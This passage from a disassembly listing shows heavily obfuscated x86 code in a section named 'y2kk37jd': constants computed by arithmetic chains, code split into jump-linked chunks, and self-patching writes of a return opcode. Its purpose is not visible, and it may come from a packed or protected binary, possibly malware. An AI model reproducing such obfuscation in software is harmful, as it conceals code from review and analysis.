; END OF FUNCTION CHUNK	FOR sub_45593D
; ---------------------------------------------------------------------------

loc_43BCEE:				; CODE XREF: y2kk37jd:00452165j
		mov	eax, [esp]
		push	edx
		push	ebx
		push	7967D34Eh
		xchg	ebp, [esp]
		mov	ebx, ebp
		jmp	loc_43C6A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E534

loc_43BD02:				; CODE XREF: sub_44E534+5j
		jmp	ds:off_41E1B0
; END OF FUNCTION CHUNK	FOR sub_44E534
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43BD08:				; CODE XREF: sub_445226-8CD9j
		jmp	loc_43F1B1
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_43BD0D	proc near		; CODE XREF: sub_44E534p
					; sub_43BD0D+1A864j ...

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B01E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BEBC SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0043D868 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043DE77 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DF2B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043E900 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043FD56 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044014F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044228D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442643 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004428FD SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044502F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00445A48 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00445ECE SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004460AF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004467C5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447552 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004475B5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004483DC SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A561 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044AB0B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B40F SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044B44E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044CCA5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DA11 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044DE0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EA47 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044ED72 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00450450 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450A07 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004519EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451EB5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452681 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045310A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453CDE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456568 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00458FB4 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045B39E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045B49E SIZE 00000008 BYTES

		pop	edx
		js	loc_456576
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_44F3F5
		jmp	loc_44CCA5
sub_43BD0D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_43BD22:				; CODE XREF: sub_43F911+C61j
		jz	loc_44CBE1
		jmp	loc_44C7C6
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
		shl	edi, 0Fh
		jmp	loc_443AA1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C638

loc_43BD35:				; CODE XREF: sub_43C638+1742Cj
		mov	byte ptr [eax],	0C3h
		jmp	loc_455672
; END OF FUNCTION CHUNK	FOR sub_43C638

; =============== S U B	R O U T	I N E =======================================



sub_43BD3D	proc near		; CODE XREF: sub_4198C0+67p
					; y2kk37jd:0045682Ej
					; DATA XREF: ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B474 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043DF99 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044A8A2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044FB12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452BFC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453386 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00454B08 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456839 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00457E56 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00458230 SIZE 00000005 BYTES

		push	esi
		push	67DDAC96h
		pop	esi
		jmp	loc_44A8A2
sub_43BD3D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43BD49	proc near		; CODE XREF: sub_43EAA8+9p
					; y2kk37jd:00455A3Bj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D804 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00446FC4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044AF5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D60 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455FDC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045A32F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A63E SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_4436E7
		test	al, al
		jz	loc_43D804
		jmp	loc_44AF5A
sub_43BD49	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580F2

loc_43BD5F:				; CODE XREF: sub_4580F2+Aj
		or	ebx, 1C78FF15h
		and	ebx, ds:4000F0h
		add	ebx, 1C74689Fh
		add	ebx, ebp
		jmp	loc_45B68C
; END OF FUNCTION CHUNK	FOR sub_4580F2

; =============== S U B	R O U T	I N E =======================================



sub_43BD78	proc near		; DATA XREF: sub_445226-68A6o

; FUNCTION CHUNK AT 00441D59 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444E5B SIZE 00000003 BYTES
; FUNCTION CHUNK AT 004511C0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459C1F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459D10 SIZE 00000022 BYTES

		or	eax, eax

loc_43BD7A:				; CODE XREF: y2kk37jd:004428B1j
		jnz	loc_444E5B
		jmp	loc_459C1F
sub_43BD78	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_408. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_43BD86:				; CODE XREF: sub_451A35-B3C3j
		jz	loc_4577CA
		jmp	loc_44ABDD
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------

loc_43BD91:				; CODE XREF: y2kk37jd:00447D26j
		xchg	ecx, esi
		xor	edx, 0B552CEC9h
		popf
		test	edx, 691B971Ch
		jmp	loc_44EE16
; ---------------------------------------------------------------------------
		jnp	loc_43D5D3
		jmp	sub_44CC31
; ---------------------------------------------------------------------------
		xor	eax, 0D6B7FF8Dh
		rol	eax, 18h
		push	ebx
		push	87BBBE36h
		pop	ebx
		add	ebx, 1333C6B5h
		sub	ebx, 1AFD40F0h
		rol	ebx, 13h
		jmp	loc_4582B1
; ---------------------------------------------------------------------------

loc_43BDD4:				; CODE XREF: y2kk37jd:0044AB82j
		or	esi, 1E32ACFFh
; START	OF FUNCTION CHUNK FOR sub_459E88

loc_43BDDA:				; CODE XREF: sub_459E88-F31Fj
		xor	ecx, 0A274A93Ch
		sub	ecx, ds:4000EFh
		add	ecx, 41E11FA0h
		xchg	ecx, [esp+0]
		jmp	nullsub_500
; END OF FUNCTION CHUNK	FOR sub_459E88

; =============== S U B	R O U T	I N E =======================================



sub_43BDF4	proc near		; CODE XREF: y2kk37jd:0043F018j
					; y2kk37jd:loc_44CA4Ej	...

; FUNCTION CHUNK AT 0043B03C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C13B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004510FA SIZE 00000013 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp+0]
		jmp	loc_4510FA
sub_43BDF4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_43BE05:				; CODE XREF: sub_43F346:loc_449E52j
		sbb	edx, 351B0EEDh
		xor	ebx, esi
		mov	ebx, [esi]
		mov	ebp, edi
		and	ebx, 0ACE5EF65h
		jmp	loc_459248
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_43BE1C:				; CODE XREF: sub_4490B4+CCDFj
		jp	loc_45410B
		sbb	ebp, 0E75C8974h

loc_43BE28:				; CODE XREF: y2kk37jd:loc_455172j
		xor	edi, 0BF96CF22h
		add	edi, 0DEA15398h
		add	edi, ebp
		jmp	loc_44A421
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_43BE3B:				; CODE XREF: sub_43C46D:loc_43B9CFj
		pop	edx
		add	edx, ds:4000EFh
		or	edx, 85E0AC31h
		add	edx, ds:4000EAh
		jmp	loc_44B789
; END OF FUNCTION CHUNK	FOR sub_43C46D

; =============== S U B	R O U T	I N E =======================================



sub_43BE53	proc near		; CODE XREF: sub_4468E0:loc_44E8D3p
					; y2kk37jd:00455699j

; FUNCTION CHUNK AT 004417FB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E88C SIZE 00000014 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	73E59706h
		pop	edi
		and	edi, 97E6776Ch
		jmp	loc_4417FB
sub_43BE53	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448F60

loc_43BE68:				; CODE XREF: sub_448F60:loc_45BAE6j
		and	edx, 0F2353B03h
		test	edx, 40000h
		jmp	loc_43DD87
; END OF FUNCTION CHUNK	FOR sub_448F60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F6F8

loc_43BE79:				; CODE XREF: sub_44F6F8+8j
		mov	eax, [esp+0]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		jmp	sub_4439EE
; END OF FUNCTION CHUNK	FOR sub_44F6F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453849

loc_43BE87:				; CODE XREF: sub_453849-F4C5j
		rol	esi, 0Ch
		or	esi, ds:4000F1h
		add	esi, 88484E66h
		popf
		xchg	esi, [esp+4+var_4]
		jmp	loc_4437ED
; END OF FUNCTION CHUNK	FOR sub_453849
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_43BE9F:				; CODE XREF: sub_44AD49+2AAEj
		push	639C7007h
		pop	eax
		sub	eax, 0A29C5132h
		and	eax, 12E01DECh
		add	eax, 0DDF5CBFFh
		jmp	loc_443D61
; END OF FUNCTION CHUNK	FOR sub_44AD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_43BEBC:				; CODE XREF: sub_43BD0D:loc_44DE0Cj
		mov	eax, edx
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_43BEBE:				; CODE XREF: sub_44B03F:loc_445B5Cj
		nop
		mov	eax, [esp+0]
		call	sub_4526B7
		retn
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
dword_43BEC8	dd 0A06F34FEh		; DATA XREF: sub_43C865:loc_44AC12w
					; sub_4552EB:loc_44C6E9r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_43BECC:				; CODE XREF: sub_443BAF+26F4j
		jmp	sub_446183
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43BED1:				; CODE XREF: sub_445226-483Bj
		jmp	loc_459A2B
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448A12

loc_43BED6:				; CODE XREF: sub_448A12-D9C1j
		jmp	loc_451B35
; END OF FUNCTION CHUNK	FOR sub_448A12

; =============== S U B	R O U T	I N E =======================================



sub_43BEDB	proc near		; CODE XREF: sub_410870+22p
					; sub_419A9F+29p ...
		call	sub_4587AA
		jmp	ds:off_41E054
sub_43BEDB	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E2D

loc_43BEE6:				; CODE XREF: sub_447E2D+Cj
		jmp	loc_458959
; END OF FUNCTION CHUNK	FOR sub_447E2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43BEEB:				; CODE XREF: sub_43F8B8-22FCj
		jmp	nullsub_373
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
		dd 0B18DCDBFh, 558A0F30h, 810001F8h, 43660AC7h
; ---------------------------------------------------------------------------
		xchg	eax, ecx
; START	OF FUNCTION CHUNK FOR sub_4468E0

loc_43BF01:				; CODE XREF: sub_4468E0:loc_45367Bj
		rol	eax, 10h
		add	eax, 937692FBh
		jmp	loc_45C1BA
; END OF FUNCTION CHUNK	FOR sub_4468E0
; ---------------------------------------------------------------------------

loc_43BF0F:				; CODE XREF: y2kk37jd:loc_45AE6Bj
		pushf
		jmp	sub_44E7AF
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E17C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
		dd 165784h, 24048700h, 0CBE9D08Bh, 0F000098h, 311A89h
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_43BF31	proc near		; CODE XREF: sub_4441FF:loc_43F499p

; FUNCTION CHUNK AT 0043CFFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EAEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F933 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00443928 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A70C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044B2D1 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044FBCB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451891 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00453BFE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045751F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004588C4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B3E2 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		xor	eax, eax
		mov	[ebp-4], eax

loc_43BF3A:				; CODE XREF: sub_455E0B-14C96j
					; sub_45B583+7j
		jno	loc_453BFE
		call	sub_455E0B

loc_43BF45:				; CODE XREF: y2kk37jd:00453547j
		jmp	loc_451891
sub_43BF31	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E4A5

loc_43BF4A:				; CODE XREF: sub_44E4A5+16j
		jmp	nullsub_84
; END OF FUNCTION CHUNK	FOR sub_44E4A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DC

loc_43BF4F:				; CODE XREF: sub_4421DC+93C1j
		jmp	loc_452EB3
; END OF FUNCTION CHUNK	FOR sub_4421DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_43BF54:				; CODE XREF: sub_4411C3:loc_447D65j
		jz	loc_4422C8
		jmp	loc_447002
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_43BF5F	proc near		; CODE XREF: y2kk37jd:00447AB8p
					; y2kk37jd:00448D63j

; FUNCTION CHUNK AT 0043CC44 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00440332 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004411E0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442C82 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445150 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00450BC2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004517D7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045A43C SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0045BA2B SIZE 00000019 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	[edx], al
		inc	dword ptr [ebp-28h]
		mov	eax, [ebp-24h]
		cmp	byte ptr [eax],	2Eh
		jnz	loc_43CC44
		jmp	loc_442C82
sub_43BF5F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43BF79	proc near		; DATA XREF: y2kk37jd:00444D96o
		sub	al, 99h
		mov	edx, [ebp-4]
		call	sub_44D6BF
sub_43BF79	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44E5E5

loc_43BF83:				; CODE XREF: sub_44E5E5+Bj
		jmp	loc_43E4C7
; END OF FUNCTION CHUNK	FOR sub_44E5E5

; =============== S U B	R O U T	I N E =======================================



sub_43BF88	proc near		; CODE XREF: y2kk37jd:00444A1Aj
					; y2kk37jd:0044A2F9p

; FUNCTION CHUNK AT 004467D8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044A865 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	400h
		push	7D9E6E80h
		pop	eax
		xor	eax, 0B0164367h
		and	eax, 3F9AF79Ch
		jmp	loc_44A865
sub_43BF88	endp

; ---------------------------------------------------------------------------

loc_43BFA8:				; CODE XREF: y2kk37jd:004543ACj
		jnp	loc_459E23

; =============== S U B	R O U T	I N E =======================================



sub_43BFAE	proc near		; CODE XREF: sub_453867-8FD8p

; FUNCTION CHUNK AT 0043CA89 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004491D2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D162 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044ECA3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004560D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456CED SIZE 00000027 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 86DF69ADh
		mov	[edx], eax
		pop	edx
		popf

loc_43BFBC:				; CODE XREF: sub_44CDD5:loc_447348j
		mov	eax, offset dword_44BF10
		jmp	loc_44ECA3
sub_43BFAE	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_210. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_43BFC7:				; CODE XREF: sub_442DDC+C2E3j
		jmp	loc_45707E
; END OF FUNCTION CHUNK	FOR sub_442DDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443688

loc_43BFCC:				; CODE XREF: sub_443688-AA5j
		jmp	loc_4502B3
; END OF FUNCTION CHUNK	FOR sub_443688
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_43BFD1:				; CODE XREF: sub_44EE3D:loc_4470BCj
		mov	eax, ds:dword_444AF4
		or	eax, eax
		jnz	loc_45101D
		jmp	loc_45793D
; END OF FUNCTION CHUNK	FOR sub_44EE3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C4A9

loc_43BFE4:				; CODE XREF: sub_43C4A9+BC04j
		mov	eax, [ebp-14h]
		mov	eax, [eax+60h]
; END OF FUNCTION CHUNK	FOR sub_43C4A9
; START	OF FUNCTION CHUNK FOR sub_443EAB

loc_43BFEA:				; CODE XREF: sub_443EAB+A4DEj
		push	offset loc_43DAC3
		jmp	nullsub_358
; END OF FUNCTION CHUNK	FOR sub_443EAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_43BFF4:				; CODE XREF: sub_451A35-EE47j
					; sub_448587:loc_445F32j
		add	edx, 55C8A51Dh
		or	edx, 49F32243h
		add	edx, 276548B7h
		sub	edx, 6C10F8A6h
		add	edx, 0E6F41012h
		jmp	loc_4598D6
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
		push	7E0AC200h
		pop	edx
		and	edx, 0B5CA7B71h
		cmp	edx, 0A5F6902h
		jmp	loc_445EAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_43C02E:				; CODE XREF: sub_43F911:loc_45AB1Dj
		mov	eax, [eax+3Ch]
		cdq
		add	eax, [esp+0]
		adc	edx, [esp+arg_0]
		add	esp, 8
		mov	[ebp-4], eax
		jmp	loc_45C70F
; END OF FUNCTION CHUNK	FOR sub_43F911

; =============== S U B	R O U T	I N E =======================================



sub_43C044	proc near		; CODE XREF: sub_445226+113j
					; y2kk37jd:0044D26Dp

; FUNCTION CHUNK AT 0044575E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004543CC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045590C SIZE 0000001F BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	edx
		push	51A20854h
		pop	edx
		jmp	loc_45590C
sub_43C044	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43C054	proc near		; CODE XREF: y2kk37jd:004439D8j
					; sub_447977+6p ...

arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0043B13A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043B4B7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00442860 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004431A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004460BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446DBA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D3AC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00450E73 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452D22 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00453167 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459336 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0045A93E SIZE 00000005 BYTES

		xchg	edx, [esp+0]

loc_43C057:				; CODE XREF: sub_445226:loc_43F831j
		pop	edx
		push	ebx
		mov	ebx, ebp
		jmp	loc_43B4B7
sub_43C054	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43C060:				; CODE XREF: sub_445226:loc_44E668j
		call	sub_442EB4
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43C065:				; CODE XREF: sub_453867+192j
		jmp	loc_443A64
; END OF FUNCTION CHUNK	FOR sub_453867

; =============== S U B	R O U T	I N E =======================================



sub_43C06A	proc near		; CODE XREF: y2kk37jd:0043CFB7j
					; y2kk37jd:loc_448441p

; FUNCTION CHUNK AT 0043EE85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453601 SIZE 00000022 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		call	sub_43C326
		push	0ACE34F7h
		pop	eax

loc_43C07F:				; CODE XREF: y2kk37jd:0044D291j
		jmp	loc_43EE85
sub_43C06A	endp

; ---------------------------------------------------------------------------

loc_43C084:				; CODE XREF: y2kk37jd:00453BC7j
		xor	eax, 38D7AE39h
		rol	eax, 12h
		xor	eax, 0F264F049h
		or	eax, 4A386E3Dh
		jmp	loc_457953
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_38. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_43C0A0:				; CODE XREF: sub_44A6B5+11j
		jmp	loc_4483A4
; END OF FUNCTION CHUNK	FOR sub_44A6B5

; =============== S U B	R O U T	I N E =======================================



sub_43C0A5	proc near		; CODE XREF: sub_44023C:loc_44DF00p
					; sub_4548FB+8p

var_4		= dword	ptr -4

		jnb	sub_45596A
		push	esi
		mov	esi, ebp
		xchg	esi, [esp+4+var_4]
		mov	ebp, esp
		call	sub_445E03
sub_43C0A5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43C0B8	proc near		; CODE XREF: y2kk37jd:0043CAB2j
					; sub_44C5E9+6p

; FUNCTION CHUNK AT 0043EB01 SIZE 0000000C BYTES

		xchg	edi, [esp+0]
		pop	edi
		jnz	loc_43EB07
		call	sub_444440
		or	eax, eax
		jmp	loc_43EB01
sub_43C0B8	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_518. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EE8A

loc_43C0CF:				; CODE XREF: sub_43EE8A+5146j
		jmp	loc_454516
; END OF FUNCTION CHUNK	FOR sub_43EE8A
; ---------------------------------------------------------------------------

loc_43C0D4:				; CODE XREF: y2kk37jd:00441EE5j
					; y2kk37jd:0044C4E3j
		push	offset loc_454F72
		jmp	locret_456CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43C0DE:				; CODE XREF: sub_445226+1ADBj
		popf
		cmp	ecx, 67D5FE46h

loc_43C0E5:				; CODE XREF: sub_445226:loc_44F536j
		jmp	loc_43CFBC
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F618

loc_43C0EA:				; CODE XREF: sub_43F618-318Aj
		mov	edi, [edx]

loc_43C0EC:				; CODE XREF: sub_43F618:loc_43C484j
		rol	edi, 1Ah
		add	edi, 0F377AE3Ch
		add	edi, ebp
		push	ecx
		jmp	loc_4519C4
; END OF FUNCTION CHUNK	FOR sub_43F618
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_43C0FD:				; CODE XREF: sub_451634-E8BDj
					; sub_456809+9B0j
		js	loc_443D84
		add	eax, 0A997C8FDh

loc_43C109:				; CODE XREF: sub_445787:loc_447FE8j
		push	offset loc_440A82
		jmp	loc_4527EA
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_43C113:				; CODE XREF: y2kk37jd:00449D3Fj
		rol	esi, 11h
		add	esi, 1B41E38Dh
		jb	loc_443CFD

loc_43C122:				; CODE XREF: y2kk37jd:0043E702j
		jmp	sub_4577FE
; ---------------------------------------------------------------------------
		pop	esi
		jmp	loc_443CFA
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		ror	eax, 3
		mov	ds:dword_446BA8, eax
		jmp	locret_44DCB5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D4CE

loc_43C141:				; CODE XREF: sub_43D4CE:loc_454297j
		mov	byte ptr [eax],	0C3h

loc_43C144:				; CODE XREF: sub_4569D1+Ej
		call	nullsub_22
		call	sub_44B814
		push	edx
		jmp	loc_457DB3
; END OF FUNCTION CHUNK	FOR sub_43D4CE
; ---------------------------------------------------------------------------
		push	ecx
		mov	ecx, [esp+10h]
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_457EF2
		push	edi
		push	76C4C035h
		pop	edi
		jmp	loc_43EAF1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_234. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_423. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43C173:				; CODE XREF: y2kk37jd:00457F92j
		jmp	locret_43FB0E
; ---------------------------------------------------------------------------

loc_43C178:				; CODE XREF: y2kk37jd:0043C4D1j
		jmp	loc_44DF5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F42

loc_43C17D:				; CODE XREF: sub_442F42:loc_4455E6j
		call	sub_442DDC

loc_43C182:				; CODE XREF: sub_44113A+14764j
		jmp	loc_4505BA
; END OF FUNCTION CHUNK	FOR sub_442F42
; ---------------------------------------------------------------------------

loc_43C187:				; CODE XREF: y2kk37jd:0043F70Ej
		js	loc_4518D4

; =============== S U B	R O U T	I N E =======================================



sub_43C18D	proc near		; CODE XREF: y2kk37jd:00447788p

; FUNCTION CHUNK AT 0044FAD1 SIZE 0000000A BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	edi
		push	0C23D1F4Eh
		pop	edi
		sub	edi, 3CADC6A8h
		add	edi, 7AB5031Ch
